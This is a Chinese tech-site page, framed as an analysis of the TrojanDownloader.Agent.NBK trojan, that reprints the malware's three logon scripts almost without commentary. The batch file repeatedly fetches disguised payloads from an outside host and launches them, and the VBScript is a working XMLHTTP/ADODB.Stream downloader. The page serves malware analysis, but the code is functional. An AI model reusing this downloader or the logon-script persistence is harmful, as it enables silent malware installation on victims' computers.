知识屋:更实用的电脑技术知识网站
知识屋 手机游戏 手机软件 电脑软件 最近更新 手机端
冒险村物语 英雄无敌3塔防 驾考家园手游
password怎么用?p 诺诺视频会议怎 网易UU网游加速
所在位置:首页 > 网络安全 > 病毒学院

解析TrojanDownloader.Agent.NBK木马脚本

发布时间:2011-06-21 14:48:55作者:知识屋

C:WINDOWSsystem32GroupPolicyUserScriptsLogon 目录下的三个文件
donw.vbs
shijian.vbs
sys.bat

 

sys.bat 内容:
 

@Echo Off
Del /f /s /q /a %SystemRoot%Websvchst.exe
:Next
Del /f /s /q /a %SystemRoot%Websvchst.bat
:Next
Del /f /s /q /a %SystemRoot%Websvchst.vbs
:Next
Del /f /s /q /a %SystemRoot%Websvchost.vbs
:Next
Del /f /s /q /a %SystemRoot%Websvchost.bat
:Next
Del /f /s /q /a %SystemRoot%Websvchost.exe
:Next
Del /f /s /q /a %SystemRoot%Websvchost1.bat
:Next
Del /f /s /q /a %SystemRoot%Websvchost1.exe
:Next
ping www.google.com &&Goto ok
Goto End
:ok
%SystemRoot%system32GroupPolicyUserScriptsLogondonw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201001.swf %SystemRoot%Websvchst.vbs
:Next
%SystemRoot%system32GroupPolicyUserScriptsLogonshijian.vbs
:Next
%SystemRoot%system32GroupPolicyUserScriptsLogondonw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201002.swf %SystemRoot%Websvchst.bat
:Next
%SystemRoot%system32GroupPolicyUserScriptsLogonshijian.vbs
:Next
%SystemRoot%system32GroupPolicyUserScriptsLogondonw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201003.swf %SystemRoot%Websvchst.exe
:Next
%SystemRoot%system32GroupPolicyUserScriptsLogonshijian.vbs
:Next
start %SystemRoot%Websvchst.vbs
:Next
%SystemRoot%system32GroupPolicyUserScriptsLogondonw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201004.swf %SystemRoot%Websvchost.vbs
:Next
%SystemRoot%system32GroupPolicyUserScriptsLogonshijian.vbs
:Next
%SystemRoot%system32GroupPolicyUserScriptsLogondonw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201005.swf %SystemRoot%Websvchost.bat
:Next
%SystemRoot%system32GroupPolicyUserScriptsLogonshijian.vbs
:Next
%SystemRoot%system32GroupPolicyUserScriptsLogondonw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201006.swf %SystemRoot%Websvchost.exe
:Next
%SystemRoot%system32GroupPolicyUserScriptsLogondonw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201007.swf %SystemRoot%Websvchost1.bat
:Next
%SystemRoot%system32GroupPolicyUserScriptsLogonshijian.vbs
:Next
%SystemRoot%system32GroupPolicyUserScriptsLogondonw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201008.swf %SystemRoot%Websvchost1.exe
:Next
%SystemRoot%system32GroupPolicyUserScriptsLogonshijian.vbs
:Next
start %SystemRoot%Websvchost.vbs
Exit
:End
ping www.google.com &&Goto ok
Goto End
 

 

 

donw.vbs 内容:

on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
wscript.sleep 1
if iUser="" and iPass="" then
xPost.Open "GET",iRemote,0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile iLocal,1
 
 

 


shijian.vbs 内容:

Dim Wsh
set ws=wscript.createobject("wscript.shell")
Wscript.Sleep 1000 
 

 

 

(免责声明:文章内容如涉及作品内容、版权和其它问题,请及时与我们联系,我们将在第一时间删除内容,文章内容仅供参考)
收藏

上一篇:NOD32 误报IMM.DLL中Win32/Kheagol.D 病毒解决办法

下一篇:走出杀软的误区--认清木马与病毒

知识阅读

软件推荐

更多 >

游戏推荐

更多 >

精选栏目

热门推荐

  • 人气文章
  • 最新文章
  • 下载排行榜
  • 热门排行榜

手机游戏

手机软件

电脑软件

猜你喜欢

动作 360 导航 唱歌 格斗 奇迹 武侠 区块链 塔防 养成 个人借贷 招聘 解谜 教育 音乐 母婴 抖音 分期 抢红包 西游 运动 关卡 宫斗 漫画 联机 摄影 医疗 吃鸡 棋牌 拍照 三国 手机赚钱 冒险 3D 街机 体育 低息 赛车 二次元 学习 视频 竞速 模拟 英语口语 舞蹈 魔幻 策略 辅助 彩票 网贷借钱

本站所有软件来自互联网,版权归原著所有。如有侵权,敬请来信告知,我们将及时撤销。

知识屋 www.zhishiwu.com 更实用的电脑技术知识网站

苏ICP备14019037号-7